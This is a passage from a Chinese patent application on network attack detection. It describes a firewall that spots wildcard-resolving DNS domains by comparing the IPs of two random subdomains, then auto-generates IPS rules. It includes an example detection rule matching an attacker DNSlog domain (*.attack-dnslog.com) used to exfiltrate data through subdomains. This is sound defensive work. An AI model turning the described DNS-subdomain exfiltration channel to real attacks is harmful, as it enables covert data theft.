示例性地,生成IPS检测规则:http(*.attack-dnslog.com),该规则表示通过防火墙流量中的HTTP请求,如有包含*.attack-dnslog.com字符串,均生成告警。
根据新生成的检测规则,持续监控后续流量,捕获攻击。实际攻击过程中,业务服务器至公告DNS服务器的攻击载荷会持续进行,当防火墙新生成对应检测规则时,攻击者向业务服务器发送的攻击载荷将被检出,同步关联前述攻击流量产生告警,两者告警相关联,最终生成完整攻击事件:xxx命令执行漏洞利用成功攻击事件。
请参阅图5,其中,图5中的业务服务器相当于图1所示的用户设备100,防火墙相当于图1所示的网络安全装置200,公共DNS服务器相当于图1所示的域名服务器300。该攻击检测方法包括步骤501至步骤507。
501、攻击者向业务服务器发起攻击;
502、业务服务器发起第一域名请求;
步骤501-步骤502与图4对应的步骤401-步骤402类似,此处不再赘述。
503、业务服务器获取第一域名请求的响应消息;
公共DNS服务器向业务服务器返回域名请求的响应消息,即Answer(1),该响应消息经由防火墙发送至业务服务器。
504、防火墙发起第二域名请求;
在防火墙获取Query(1)域名之后,防火墙对提取到域名的父域名进行随机子域名生成,例如可以通过:hash(attack-dnslog.com)计算,生成Query(2)子域名。
505、防火墙获取第二域名请求的响应消息;
防火墙获取第二域名请求的响应消息Answer(2)并记录返回的Answer(2)中的IP(2)。
506、防火墙发起第三域名请求;
在防火墙获取Query(1)域名之后,防火墙对提取到域名的父域名进行随机子域名生成,例如可以通过:hash(attack-dnslog.com)计算,生成Query(3)子域名。需要说明的是,Query(2)子域名与Query(3)子域名不同。
需要说明的是,步骤504和步骤506的执行顺序不做限定。
507、防火墙获取第三域名请求的响应消息;
防火墙获取第三域名请求的响应消息Answer(3)并记录返回的Answer(3)中的IP(3):
防火墙获取IP(2)和IP(3)之后,防火墙判断IP(2)和IP(3)是否一致;
若返回IP(3)地址与IP(2)地址一致,则认为域名开启泛解析功能,防火墙根据检出的泛解析域名,自动生成对应检测规则。具体可参考前述实施例,此处不再赘述。进一步地,防火墙可以根据新生成的检测规则,持续监控后续流量,捕获后续攻击。
上面介绍了本申请提供的攻击检测方法,下面对实现该攻击检测方法的网络安全装置进行介绍,请参阅图6,为本申请实施例中网络安全装置的一个实施例示意图。
本申请实施例提供的网络安全装置,包括:
获取模块601,用于截获第一域名请求,并基于所述第一域名请求获取目标域名,所述目标域名为所述第一域名请求中携带的域名的父域名;
所述获取模块601还用于,获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,所述第一子域名与所述第二子域名不同;
处理模块602,若所述第一IP地址与所述第二IP地址相同,则用于生成检测规则,所述检测规则的匹配条件中包括所述目标域名,所述检测规则用于检测基于所述目标域名实施的攻击。
可选地,所述装置还包括:
所述获取模块601,还用于在获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,根据所述目标域名生成所述第一子域名和所述第二子域名;所述装置还包括:收发模块603,用于向域名服务器发送第二域名请求,所述第二域名请求中携带所述第一子域名;所述收发模块603,还用于接收所述域名服务器返回的所述第二域名请求的响应消息,所述第二域名请求的响应消息中携带所述第一IP地址;所述收发模块603,还用于向域名服务器发送第三域名请求,所述第三域名请求中携带所述第二子域名;所述收发模块603,还用于接收所述域名服务器返回的所述第三域名请求的响应消息,所述第三域名请求的响应消息中携带所述第二IP地址。
可选地,所述获取单元,具体用于:从所述第二域名请求的响应消息中获取所述第一IP地址;以及,从所述第三域名请求的响应消息中获取所述第二IP地址。
可选地,所述获取模块601,具体用于:将所述第一域名请求中携带的域名中的全部或部分输入第一预定算法,根据所述第一预定算法的输出生成所述第一子域名;将所述第一域名请求中携带的域名中的全部或部分输入第二预定算法,根据所述第二预定算法的输出生成所述第二子域名。
可选地,所述第一子域名是所述第一域名请求中携带的域名,所述装置还包括:获取模块601,用于在获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,根据所述目标域名生成所述第二子域名;收发模块603,用于向域名服务器转发所述第一域名请求;所述收发模块603,还用于接收所述第一域名请求的响应消息,所述第一域名请求的响应消息中携带所述第一IP地址;所述收发模块603,还用于向域名服务器发送第四域名请求,所述第四域名请求中携带所述第二子域名;所述收发模块603,还用于接收所述域名服务器返回的所述第四域名请求的响应消息,所述第四域名请求的响应消息中携带所述第二IP地址。
可选地,所述获取模块601,具体用于:从所述第一域名请求的响应消息中获取所述第一IP地址;从所述第四域名请求的响应消息中获取所述第二IP地址。
可选地,所述获取模块601,具体用于:将所述第一域名请求中携带的域名中的全部或部分输入第三预定算法,根据所述第三预定算法的输出生成所述第二子域名。
可选地,所述第三预定算法包括加密算法或编码算法,所述获取模块601,具体用于:将所述第一域名请求中携带的域名中的全部或部分输入所述第三预定算法,获取所述第三预定算法输出的字符串;将所述字符串与所述目标域名进行组合,生成所述第二子域名。
可选地,所述域名服务器包括:公共域名服务器或预设的威胁域名服务器。
可选地,所述网络安全装置预设域名白名单;
所述装置还包括:确定模块604,用于在生成检测规则之前,确定所述目标域名不属于所述域名白名单。
可选地,所述检测规则中的动作包括:生成攻击告警,所述攻击告警用于指示发生基于所述目标域名实施的攻击。
本实施例中网络安全装置获取模块根据第一域名请求中获取第一域名的父域名即目标域名,处理模块通过比较目标域名的两个子域名对应的IP地址相同确定目标域名开启了泛解析功能,因此网络安全装置针对该目标域名自动生成检测规则,由此可以实现对目标域名通过子域名传递信息的攻击检测,还可以减少由于人工收集及编写检测规则带来的检测成本。
应理解以上终端的各个模块的划分仅仅是一种逻辑功能的划分,实际实现时可以全部或部分集成到一个物理实体上,也可以物理上分开。且这些模块可以全部以软件通过处理元件调用的形式实现;也可以全部以硬件的形式实现;还可以部分模块以软件通过处理元件调用的形式实现,部分模块以硬件的形式实现。例如,以上这些模块可以是被配置成实施以上方法的一个或多个集成电路,例如:一个或多个特定集成电路(applicationspecific integrated circuit,ASIC),或,一个或多个微处理器(digital singnalprocessor,DSP),或,一个或者多个现场可编程门阵列(field programmable gate array,FPGA)等。再如,当以上某个模块通过处理元件调度程序的形式实现时,该处理元件可以是通用处理器,例如中央处理器(central processing unit,CPU)或其它可以调用程序的处理器。再如,这些模块可以集成在一起,以片上系统(system-on-a-chip,SOC)的形式实现。
请参阅图7,为本申请实施例中网络安全装置的另一个实施例示意图;
本实施例提供的网络安全装置,包括IPS、IDS或防火墙等各种类型的装置,本申请实施例中对网络安全装置的具体设备形态不做限定。
该网络安全装置700可因配置或性能不同而产生比较大的差异,可以包括一个或一个以上处理器701和存储器702,该存储器702中存储有程序或数据。
其中,存储器702可以是易失性存储或非易失性存储,存储器702可用于实现与应用程序对应的缓存库,用于存储各类文件。包括。可选地,处理器701是一个或多个中央处理器(central processing unit,CPU),该CPU可以是单核CPU,也可以是多核CPU。处理器701可以与存储器702通信,在网络安全装置700上执行存储器702中的一系列指令。
该网络安全装置700还包括一个或一个以上有线或无线网络接口703,例如以太网接口。一个或一个以上输入输出接口704。输入输出接口可以用于连接显示器、鼠标、键盘、触摸屏设备或传感设备等,输入输出接口为可选部件,可以存在也可以不存在,此处不做限定。
可选地,尽管图7中未示出,网络安全装置700还可以包括一个或一个以上电源,及其他部件。
本实施例中网络安全装置700中的处理器701所执行的流程可以参考前述方法实施例中描述的方法流程,此处不加赘述。
所属领域的技术人员可以清楚地了解到,为描述的方便和简洁,上述描述的系统,装置和单元的具体工作过程,可以参考前述方法实施例中的对应过程,在此不再赘述。
在本申请所提供的几个实施例中,应该理解到,所揭露的系统,装置和方法,可以通过其它的方式实现。例如,以上所描述的装置实施例仅仅是示意性的,例如,所述单元的划分,仅仅为一种逻辑功能划分,实际实现时可以有另外的划分方式,例如多个单元或组件可以结合或者可以集成到另一个系统,或一些特征可以忽略,或不执行。另一点,所显示或讨论的相互之间的耦合或直接耦合或通信连接可以是通过一些接口,装置或单元的间接耦合或通信连接,可以是电性,机械或其它的形式。
所述作为分离部件说明的单元可以是或者也可以不是物理上分开的,作为单元显示的部件可以是或者也可以不是物理单元,即可以位于一个地方,或者也可以分布到多个网络单元上。可以根据实际的需要选择其中的部分或者全部单元来实现本实施例方案的目的。
另外,在本申请各个实施例中的各功能单元可以集成在一个处理单元中,也可以是各个单元单独物理存在,也可以两个或两个以上单元集成在一个单元中。上述集成的单元既可以采用硬件的形式实现,也可以采用软件功能单元的形式实现。
所述集成的单元如果以软件功能单元的形式实现并作为独立的产品销售或使用时,可以存储在一个计算机可读取存储介质中。基于这样的理解,本申请的技术方案本质上或者说对现有技术做出贡献的部分或者该技术方案的全部或部分可以以软件产品的形式体现出来,该计算机软件产品存储在一个存储介质中,包括若干指令用以使得一台计算机设备(可以是个人计算机,服务器,或者网络设备等)执行本申请各个实施例所述方法的全部或部分步骤。而前述的存储介质包括:U盘、移动硬盘、只读存储器(read-only memory,ROM)、随机存取存储器(random access memory,RAM)、磁碟或者光盘等各种可以存储程序代码的介质。
以上所述,以上实施例仅用以说明本申请的技术方案,而非对其限制;尽管参照前述实施例对本申请进行了详细的说明,本领域的普通技术人员应当理解:其依然可以对前述各实施例所记载的技术方案进行修改,或者对其中部分技术特征进行等同替换;而这些修改或者替换,并不使相应技术方案的本质脱离本申请各实施例技术方案的精神和范围。

Claims (25)

1.一种攻击检测方法,其特征在于,包括:
网络安全装置截获第一域名请求,并基于所述第一域名请求获取目标域名,所述目标域名为所述第一域名请求中携带的域名的父域名;
所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,所述第一子域名与所述第二子域名不同;
若所述第一IP地址与所述第二IP地址相同,则所述网络安全装置生成检测规则,所述检测规则的匹配条件中包括所述目标域名,所述检测规则用于检测基于所述目标域名实施的攻击。
2.根据权利要求1所述的方法,其特征在于,所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,所述方法还包括:
所述网络安全装置根据所述目标域名生成所述第一子域名和所述第二子域名;
所述网络安全装置向域名服务器发送第二域名请求,所述第二域名请求中携带所述第一子域名;
所述网络安全装置接收所述域名服务器返回的所述第二域名请求的响应消息,所述第二域名请求的响应消息中携带所述第一IP地址;
所述网络安全装置向域名服务器发送第三域名请求,所述第三域名请求中携带所述第二子域名;
所述网络安全装置接收所述域名服务器返回的所述第三域名请求的响应消息,所述第三域名请求的响应消息中携带所述第二IP地址。
3.根据权利要求2所述的方法,其特征在于,所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,包括:
所述网络安全装置从所述第二域名请求的响应消息中获取所述第一IP地址;以及,
所述网络安全装置从所述第三域名请求的响应消息中获取所述第二IP地址。
4.根据权利要求2或3所述的方法,其特征在于,所述网络安全装置根据所述目标域名生成所述第一子域名和所述第二子域名,包括:
所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入第一预定算法,根据所述第一预定算法的输出生成所述第一子域名;
所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入第二预定算法,根据所述第二预定算法的输出生成所述第二子域名。
5.根据权利要求1所述的方法,其特征在于,所述第一子域名是所述第一域名请求中携带的域名,所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,所述方法还包括:
所述网络安全装置根据所述目标域名生成所述第二子域名;
所述网络安全装置向域名服务器转发所述第一域名请求;
所述网络安全装置接收所述第一域名请求的响应消息,所述第一域名请求的响应消息中携带所述第一IP地址;
所述网络安全装置向域名服务器发送第四域名请求,所述第四域名请求中携带所述第二子域名;
所述网络安全装置接收所述域名服务器返回的所述第四域名请求的响应消息,所述第四域名请求的响应消息中携带所述第二IP地址。
6.根据权利要求5所述的方法,其特征在于,所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,包括:
所述网络安全装置从所述第一域名请求的响应消息中获取所述第一IP地址;
所述网络安全装置从所述第四域名请求的响应消息中获取所述第二IP地址。
7.根据权利要求5或6所述的方法,其特征在于,所述网络安全装置根据所述目标域名生成所述第二子域名,包括:
所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入第三预定算法,根据所述第三预定算法的输出生成所述第二子域名。
8.根据权利要求7所述的方法,其特征在于,所述第三预定算法包括加密算法或编码算法,所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入第三预定算法,根据所述第三预定算法的输出生成所述第二子域名,包括:
所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入所述第三预定算法,获取所述第三预定算法输出的字符串;
将所述字符串与所述目标域名进行组合,生成所述第二子域名。
9.根据权利要求2或5所述的方法,其特征在于,所述域名服务器包括:公共域名服务器或预设的威胁域名服务器。
10.根据权利要求1至9中任一项所述的方法,其特征在于,所述网络安全装置预设域名白名单;所述网络安全装置生成检测规则之前,所述方法还包括:
确定所述目标域名不属于所述域名白名单。
11.根据权利要求1至10中任一项所述的方法,其特征在于,所述检测规则中的动作包括:生成攻击告警,所述攻击告警用于指示发生基于所述目标域名实施的攻击。
12.一种网络安全装置,其特征在于,包括:
获取模块,用于截获第一域名请求,并基于所述第一域名请求获取目标域名,所述目标域名为所述第一域名请求中携带的域名的父域名;
所述获取模块还用于,获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,所述第一子域名与所述第二子域名不同;
处理模块,若所述第一IP地址与所述第二IP地址相同,则用于生成检测规则,所述检测规则的匹配条件中包括所述目标域名,所述检测规则用于检测基于所述目标域名实施的攻击。
13.根据权利要求12所述的装置,其特征在于,所述装置还包括:
所述获取模块,还用于在获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,根据所述目标域名生成所述第一子域名和所述第二子域名;
所述装置还包括:
收发模块,用于向域名服务器发送第二域名请求,所述第二域名请求中携带所述第一子域名;
所述收发模块,还用于接收所述域名服务器返回的所述第二域名请求的响应消息,所述第二域名请求的响应消息中携带所述第一IP地址;
所述收发模块,还用于向域名服务器发送第三域名请求,所述第三域名请求中携带所述第二子域名;
所述收发模块,还用于接收所述域名服务器返回的所述第三域名请求的响应消息,所述第三域名请求的响应消息中携带所述第二IP地址。
14.根据权利要求13所述的装置,其特征在于,所述获取单元,具体用于:
从所述第二域名请求的响应消息中获取所述第一IP地址;以及,
从所述第三域名请求的响应消息中获取所述第二IP地址。
15.根据权利要求13或14所述的装置,其特征在于,所述获取模块,具体用于:
将所述第一域名请求中携带的域名中的全部或部分输入第一预定算法,根据所述第一预定算法的输出生成所述第一子域名;
将所述第一域名请求中携带的域名中的全部或部分输入第二预定算法,根据所述第二预定算法的输出生成所述第二子域名。
16.根据权利要求12所述的装置,其特征在于,所述第一子域名是所述第一域名请求中携带的域名,所述装置还包括:
获取模块,用于在获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,根据所述目标域名生成所述第二子域名;
收发模块,用于向域名服务器转发所述第一域名请求;
所述收发模块,还用于接收所述第一域名请求的响应消息,所述第一域名请求的响应消息中携带所述第一IP地址;
所述收发模块,还用于向域名服务器发送第四域名请求,所述第四域名请求中携带所述第二子域名;
所述收发模块,还用于接收所述域名服务器返回的所述第四域名请求的响应消息,所述第四域名请求的响应消息中携带所述第二IP地址。
17.根据权利要求16所述的装置,其特征在于,所述获取模块,具体用于:
从所述第一域名请求的响应消息中获取所述第一IP地址;
从所述第四域名请求的响应消息中获取所述第二IP地址。
18.根据权利要求16或17所述的装置,其特征在于,所述获取模块,具体用于:
将所述第一域名请求中携带的域名中的全部或部分输入第三预定算法,根据所述第三预定算法的输出生成所述第二子域名。
19.根据权利要求18所述的装置,其特征在于,所述第三预定算法包括加密算法或编码算法,所述获取模块,具体用于:
将所述第一域名请求中携带的域名中的全部或部分输入所述第三预定算法,获取所述第三预定算法输出的字符串;
将所述字符串与所述目标域名进行组合,生成所述第二子域名。
20.根据权利要求13或16所述的装置,其特征在于,所述域名服务器包括:公共域名服务器或预设的威胁域名服务器。
21.根据权利要求12至20中任一项所述的装置,其特征在于,所述网络安全装置预设域名白名单;
所述装置还包括:
确定模块,用于在生成检测规则之前,确定所述目标域名不属于所述域名白名单。
22.根据权利要求12至21中任一项所述的装置,其特征在于,所述检测规则中的动作包括:生成攻击告警,所述攻击告警用于指示发生基于所述目标域名实施的攻击。
23.一种网络安全装置,其特征在于,包括:
存储器,所述存储器中存储有计算机可读指令;
与所述存储器相连的处理器,所述计算机可读指令被所述处理器执行时,使得所述网络设备实现如权利要求1至11中任一项所述的方法。
24.一种计算机程序产品,其特征在于,包括计算机可读指令,当所述计算机可读指令在计算机上运行时,使得所述计算机执行如权利要求1至11任一项所述的方法。
25.一种计算机可读存储介质,其特征在于,所述计算机可读存储介质中存储有指令,当所述指令在计算机上运行时,使得所述计算机执行如权利要求1至11中任一项所述的方法。
CN202210313324.5A 2022-03-28 2022-03-28 攻击检测方法和网络安全装置 Pending CN116865983A (zh)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202210313324.5A CN116865983A (zh) 2022-03-28 2022-03-28 攻击检测方法和网络安全装置

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202210313324.5A CN116865983A (zh) 2022-03-28 2022-03-28 攻击检测方法和网络安全装置

Publications (1)

Publication Number Publication Date
CN116865983A true CN116865983A (zh) 2023-10-10

Family

ID=88222168

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202210313324.5A Pending CN116865983A (zh) 2022-03-28 2022-03-28 攻击检测方法和网络安全装置

Country Status (1)

Country Link
CN (1) CN116865983A (zh)

Similar Documents

Publication Publication Date Title
US11323469B2 (en) Entity group behavior profiling
US10469514B2 (en) Collaborative and adaptive threat intelligence for computer security
CN109474575B (zh) 一种dns隧道的检测方法及装置
US20080172739A1 (en) Attack defending system and attack defending method
JP7388613B2 (ja) パケット処理方法及び装置、デバイス、並びに、コンピュータ可読ストレージ媒体
US20200145454A1 (en) Method and system for detecting and blocking data transfer using dns protocol
JP2022531878A (ja) Dnsメッセージを使用してコンピュータ・フォレンジック・データを選択的に収集するためのシステムおよび方法
US11374946B2 (en) Inline malware detection
US11636208B2 (en) Generating models for performing inline malware detection
CN114402567A (zh) 算法生成的域的在线检测
US20220263846A1 (en) METHODS FOR DETECTING A CYBERATTACK ON AN ELECTRONIC DEVICE, METHOD FOR OBTAINING A SUPERVISED RANDOM FOREST MODEL FOR DETECTING A DDoS ATTACK OR A BRUTE FORCE ATTACK, AND ELECTRONIC DEVICE CONFIGURED TO DETECT A CYBERATTACK ON ITSELF
RU2679219C1 (ru) СПОСОБ ЗАЩИТЫ СЕРВЕРА УСЛУГ ОТ DDoS АТАК
KR101487476B1 (ko) 악성도메인을 검출하기 위한 방법 및 장치
US20190116103A1 (en) System and method for botnet identification
KR20200109875A (ko) 유해 ip 판단 방법
US10757118B2 (en) Method of aiding the detection of infection of a terminal by malware
CN113329035B (zh) 一种攻击域名的检测方法、装置、电子设备及存储介质
US11683337B2 (en) Harvesting fully qualified domain names from malicious data packets
KR20120000942A (ko) 블랙리스트 접근 통계 기반의 봇 감염 호스트 탐지 장치 및 그 탐지 방법
CN113328976B (zh) 一种安全威胁事件识别方法、装置及设备
CN116865983A (zh) 攻击检测方法和网络安全装置
KR20230139984A (ko) 허니팟을 이용한 악성 파일 탐지 방법 및 이를 이용한 시스템
JP2022541250A (ja) インラインマルウェア検出
CN114189360B (zh) 态势感知的网络漏洞防御方法、装置及系统
US20230362176A1 (en) System and method for locating dga compromised ip addresses

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination